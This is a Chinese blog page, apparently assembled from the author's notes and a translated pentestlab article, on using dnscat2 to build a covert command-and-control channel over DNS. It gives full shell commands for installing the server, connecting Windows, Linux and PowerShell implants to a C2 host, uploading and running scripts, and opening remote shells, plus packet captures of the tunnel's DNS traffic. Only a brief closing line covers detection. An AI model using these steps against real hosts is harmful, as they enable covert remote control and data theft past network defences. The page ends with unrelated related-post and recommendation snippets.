通过DNS控制主机以及执行命令

我的ubuntu 安装过程
1854 mkdir dns_tunnel_tool
1855 cd dns_tunnel_tool/
1856 ls
1857 git clone https://github.com/iagox86/dnscat2.git
1858 cd dnscat2/server/
1859 bundle install
1860 sudo apt install ruby-bundler
1861 bundle install
1862 sudo apt-get install libpq-dev
1863 bundle install
1864 gem install salsa20 -v '0.1.1'
1865 sudo gem install salsa20 -v '0.1.1'
1866 ruby
1867 ruby -v
1869 sudo apt install ruby-dev
1870 sudo gem install salsa20 -v '0.1.1'
1871 bundle install
1872 ls
1873 cd ..
1874 ls
1875 cd client/
1876 ls
1877 bundle install
1878 ls
1879 make
1880 ls
server:
ruby dnscat2.rb --dns "domain=a.xxx.com" --no-cache

1881 ./dnscat --secret=d51c2caf4d4575aa86bbdd6b354bf972 a.friendskak.com
在server端执行,上传文件到client然后执行你想要的任何命令,本质上client扮演的是服务器监听操作:
客户端提示字样:New window created: 21
session -i 21 (数字和上面一致)
upload run.sh run.sh
exec "bash run.sh"
然后在你的run.sh放入希望执行的内容 输入:
shell
然后 session -i 上面命令的提示window编号
即可远程shell了 注意:执行操作前,最好先ping下看到pong再操作!

传输文件时候,客户端提示:

Session established!
Got a command: COMMAND_PING [request] :: request_id: 0x0001 :: data: RDZNALUEEREZTOWNSRLOHDOTGDFSPHVWOTXZDDKULQCYHHAEWGALWGELDQIRZOIWIPASAAFJLQSQWZOTYESKXNSENBFIUYSDQHXFUMVCYPKIWQIQTSDHKROCDEUGAIEVBASZMJQFRGLXSKIIRMGYPZNNEKSLQKXHFRGAOLNHRXALIKISBGVTPVFWFDTVGWKGNYRJPADVWOWBWGRGIAQCTBHVKUBNXDNDMCVSEPMYFXBDLXHJDLREANVWTTBJLDWR
[[ WARNING ]] :: Got a ping request! Responding!
Response: COMMAND_PING [response] :: request_id: 0x0001 :: data: RDZNALUEEREZTOWNSRLOHDOTGDFSPHVWOTXZDDKULQCYHHAEWGALWGELDQIRZOIWIPASAAFJLQSQWZOTYESKXNSENBFIUYSDQHXFUMVCYPKIWQIQTSDHKROCDEUGAIEVBASZMJQFRGLXSKIIRMGYPZNNEKSLQKXHFRGAOLNHRXALIKISBGVTPVFWFDTVGWKGNYRJPADVWOWBWGRGIAQCTBHVKUBNXDNDMCVSEPMYFXBDLXHJDLREANVWTTBJLDWR
Got a command: COMMAND_UPLOAD [request] :: request_id: 0x0002 :: filename: run2.sh :: data: 0x2d bytes
Response: COMMAND_UPLOAD [response] :: request_id: 0x0002

导语:即使在一些限制非常严格的环境下,DNS协议还是允许处理内部和外部的通讯的。所以通过dns就可以建立起目标主机和命令&控制服务器之间的通讯。

即使在一些限制非常严格的环境下,DNS协议还是允许处理内部和外部的通讯的。所以通过dns就可以建立起目标主机和命令&控制服务器之间的通讯。由于命令和数据包都是在合法的dns查询中传输的,所以很不容易被检测到。

Dnscat2是可以实现这一技术的,它可以通过dns协议创建一个命令和控制信道。这一工具使用基于C语言编写的客户端(种植体),客户端在目标机器执行,进而与服务端建立通信。通信过程中流量是进行加密传输的,并且通过预先共享的密钥进行认证。

在kali2.0中安装这一工具可以通过以下命令:

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
bundle install

命令以及控制服务器可以通过下面命令进行初始化:

ruby dnscat2.rb --dns "domain=pentestlab,host=192.168.1.169" --no-cache

适用于windows的客户端已经编译好,你可以从https://downloads.skullsecurity.org/dnscat2/dnscat2-v0.07-client-win32.zip下载。下载完之后,只需运行一条于C&C服务端进行连接的命令:

dnscat2-v0.07-client-win32.exe --dns server=192.168.1.169

在C&C服务端,红队就可以进行会话交互:

session -i 1

通过执行“help”命令会列出所有可执行的命令:

dnscat2的一些命令是可以上传和下载文件的,并且可以通过执行其他程序得到一个远程shell。

或者可以使用“shell“命令会打开另外一个会话。

以下输出会在目标机器的命令行中显示:

shell是交互式的,而且全部是通过dns进行传输的,速度而且很快。

通过调用exec命令可以远程打开程序:

exec notepad.exe

Luke Baggett 已经开发出powershell版本的客户端,并且已经在blackhillsinfosec网站中进行了介绍,这一版本的客户端的命令和已经编译好的客户端命令是相同的,不过他还添加了一些其他功能,比如交互式的powershell会话以及可以在内存中执行任何程序。

以下命令就是在目标机器执行powershell版本客户端:

PS C:> start-Dnscat2 -Domain pentestlab -DNSServer 192.168.1.169

还可以通过以下命令直接建立powershell会话:

exec psh

这样会创建一个新的控制台,可以执行PowerShell命令和脚本:

结论

dnscat2通过DNS进行控制和执行命令有很多优点,比如:

1.支持多个会话
2.流量加密
3.通过使用密钥防止MiTM攻击
4.从内存中直接执行powershell脚本
5.隐蔽的

检测这样的攻击是非常困难的,因为任意命令是通过合法的DNS流量进行传输的,所以应该强调监控DNS查询的长度,并允许主机只与受信任的DNS服务器进行通信。

文章翻译于https://pentestlab.blog/2017/09/06/command-and-control-dns/,如若转载,请注明原文地址: http://www.4hou.com/technology/7668.html
 
 
在没有任何数据传输下,可以看到dnscat在发送dns 心跳报文:
|client$>sudo  tcpdump -i wlo1 -nt -s  port domain
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on wlo1, link-type EN10MB (Ethernet), capture size bytes
IP 192.168.10.115. > 223.5.5.5.: + MX? ad5d01003313f88400a5d907e33f3f2af5.a.xxxxx.com. ()
IP 223.5.5.5. > 192.168.10.115.: // MX a198010033062a2fd0a284ffff61cae7a9.a.xxxxx.com. ()
IP 192.168.10.115. > 223.5.5.5.: + CNAME? f6a601003330523007755707e44274c164.a.xxxxx.com. ()
IP 223.5.5.5. > 192.168.10.115.: // CNAME 7e6b010033d158b478d545ffff61cae7a9.a.xxxxx.com. ()
IP 192.168.10.115. > 223.5.5.5.: + TXT? 6d4101003317bf4a4bc85a07e5384cf5bb.a.xxxxx.com. ()
IP 223.5.5.5. > 192.168.10.115.: // TXT "2cf2010033fd736a21d252ffff61cae7a9" ()
IP 192.168.10.115. > 223.5.5.5.: + TXT? 441c0100336e4b13ee2ea107e64f4b9aaf.a.xxxxx.com. ()
IP 223.5.5.5. > 192.168.10.115.: // TXT "f20c0100337690d71b336effff61cae7a9" ()
IP 192.168.10.115. > 223.5.5.5.: + TXT? 4c230100339c5fbda3152907e73cfa807b.a.xxxxx.com. ()
IP 223.5.5.5. > 192.168.10.115.: // TXT "a99b010033f2b21a38b488ffff61cae7a9" ()
IP 192.168.10.115. > 223.5.5.5.: + MX? 553501003324eb6cb42f0c07e8e6de1dd3.a.xxxxx.com. ()
IP 223.5.5.5. > 192.168.10.115.: // MX dbcc0100334da4c1ef3984ffff61cae7a9.a.xxxxx.com. ()
IP 192.168.10.115. > 223.5.5.5.: + CNAME? 29900100338a6808f0b79f07e914b221c9.a.xxxxx.com. ()
IP 223.5.5.5. > 192.168.10.115.: // CNAME 949a0100335b2115961200ffff61cae7a9.a.xxxxx.com. ()
IP 192.168.10.115. > 223.5.5.5.: + MX? 2a6b01003377fa81e80dda07ea27177602.a.xxxxx.com. ()
IP 223.5.5.5. > 192.168.10.115.: // MX 53550100336f50c7577e02ffff61cae7a9.a.xxxxx.com. ()
IP 192.168.10.115. > 223.5.5.5.: + MX? 43be01003377c6c176827007eba97492c8.a.xxxxx.com. ()
IP 223.5.5.5. > 192.168.10.115.: // MX 0cbf010033b13ee136e779ffff61cae7a9.a.xxxxx.com. ()
IP 192.168.10.115. > 223.5.5.5.: + CNAME? 0426010033e7b72e15cf0407ec978e649e.a.xxxxx.com. ()
IP 223.5.5.5. > 192.168.10.115.: // CNAME 785b010033669bc40db0c8ffff61cae7a9.a.xxxxx.com. ()
IP 192.168.10.115. > 223.5.5.5.: + CNAME? 6594010033c0a84ee0828707ed686811f5.a.xxxxx.com. ()
IP 223.5.5.5. > 192.168.10.115.: // CNAME c39b010033bdc067cd2326ffff61cae7a9.a.xxxxx.com. ()
IP 192.168.10.115. > 223.5.5.5.: + TXT? 53850100335e9bd760b9b807eee85c8dc3.a.xxxxx.com. ()
IP 223.5.5.5. > 192.168.10.115.: // TXT "1a10010033f72b7200bc02ffff61cae7a9" ()
IP 192.168.10.115. > 223.5.5.5.: + TXT? 07a6010033555222e0706f07ef6562310d.a.xxxxx.com. ()
IP 223.5.5.5. > 192.168.10.115.: // TXT "c9bd0100339830e8373196ffff61cae7a9" ()

dns tunnel C&C的更多相关文章

  1. DNS Tunnel隧道隐蔽通信实验 && 尝试复现特征向量化思维方式检测

    1. DNS隧道简介 DNS隧道技术是指利用 DNS协议建立隐蔽信 道,实现隐蔽数据传输.最早是在2004年 DanKaminsky 在 Defcon大会上发布的基于 NSTX 的 DNS隐蔽 隧道工 ...

  2. python dig trace 功能实现——通过Querying name server IP来判定是否为dns tunnel

    dns tunnel确认方法,查询子域名最终的解析地址: 使用方法:python dig_trace.py  "<7cf1e56b 67fc90f8 caaae86e 0787e907 ...

  3. DNS tunnel的原理及实战

    DNS tunnel的原理及实战 摘自:http://netsec.ccert.edu.cn/zhengming/2011/11/01/%E8%BD%AC%E8%BD%BD%EF%BC%9Adns-t ...

  4. iodine免费上网——本质就是利用dns tunnel建立tcp,然后tcp proxy来实现通过访问虚拟dns0网卡来访问你的dns 授权server

    我的命令: server端: sudo iodined -P passwd -f -DD 10.0.0.100 abc.com client端(直连模式,-r表示使用xxx.abc.com的xxx来转 ...

  5. dnscapy使用——本质上是建立ssh的代理(通过dns tunnel)

    git clone https://github.com/cr0hn/dnscapy.git easy_install Scapy 服务端: python dnscapy_server.py a.fr ...

  6. DNS Tunnel判定方法

    DNS Tunnel判定方法: 1.查询DNS请求的域名是否存在备案: 2.查询DNS请求的域名情报信息(以及域名的alex排名): 3.查看相同主域名下子域名编码格式及长度:(存在Base32和Ba ...

  7. dns tunnel 使用 nishang 下载TXT里的cmd(TXT里)实现CC command+ ceye实现数据外发

    摘自:https://hk.saowen.com/a/a06909f1c57cb8452db969b3deede4151de42a7d69f4bb52c5bf027033fb91bd Powershe ...

  8. Xshell dns tunnel攻击

    该域名还会向多个超长域名做渗出,且域名采用了 DGA 生成算法,通过 DNS 解析时渗出数据. 部分生成域名如下: sajajlyoogrmkjlkmosbxowcrmwlvajdkbtbjoylyp ...

  9. “DNS隧道”盗号木马分析——类似hjack偷密码然后利用dns tunnel直传数据发送出去

    摘自:http://www.freebuf.com/articles/network/38276.html# 运行后不断监控顶端窗口,一旦发现为QQ,就弹出一个自己伪造的QQ登陆窗口,诱导用户输入密码 ...

随机推荐

  1. HBase编程 API入门系列之HTable pool(6)

    HTable是一个比较重的对此,比如加载配置文件,连接ZK,查询meta表等等,高并发的时候影响系统的性能,因此引入了“池”的概念. 引入“HBase里的连接池”的目的是: 为了更高的,提高程序的并发 ...

  2. MD5三种方法的学习总结

    MD5百度百科 MD5即Message-Digest Algorithm 5(信息-摘要算法5),用于确保信息传输完整一致.是计算机广泛使用的杂凑算法之一(又译摘要算法.哈希算法),主流编程语言普遍已 ...

  3. 常用图片、文字轮播插件SuperSlide

    SuperSlide 是致力于实现网站统一特效调用的函数,能解决大部分标签切换.焦点图切换等效果,还能多个slide组合创造更多的效果.(兼容ie内核(包括无敌的ie6).webkit内核.ff.op ...

  4. App Store兼容性问题

    app下载出现兼容性问题  项目支持9.0以上的系统 但是10.3的iphone5下载的一直是老版本app  下载时提示不兼容 导致无法正常使用 解决办法: 修改Build-Settings-> ...

  5. 根据业务自己设计的.NET工厂模式架构

    最近项目的架构需要做调整优化,根据业务需要写了一个简单的工厂模式架构 项目介绍:整个系统分为三大平台(这里用A,B,C来标示),每个平台又细分为多个APP客户端(每个APP都有appid来区分) 因为 ...

  6. 信息检索及DM必备知识总结:luncene

    原文链接:http://blog.csdn.net/htw2012/article/details/17734529 有少量修改!如有疑问,请访问原作者. 一:信息检索领域: 信息检索和网络数据领域( ...

  7. C语言break/continue/exit/return的功能区别

    break是跳出整个循环而执行循环体之外的下一条语句: continue只是跳出本次循环继续判断下一次循环条件是否满足. exit() 结束当前进程/当前程式/,在整个程式中,只要调用 exit ,就 ...

  8. DB2解决死锁

    方法一.查看db2diag.log文件 找到DeadLock or Lock timeout搜索 死锁或锁超时信息db2 force application(句柄ID)直接结束进程即可. 方法二.DB ...

  9. Here comes Treble: A modular base for Android

    On the Android team, we view each dessert release as an opportunity to make Android better for our u ...

  10. 【udacity】机器学习

    Evernote Export 2.人工智能简介 机器学习源自于人工智能,在此方向上,该领域有分为不同学派,机器学习主要关注的是制造能够自主动作的机器 3.人工智能难题 1.所有智能体都只有很少的计算 ...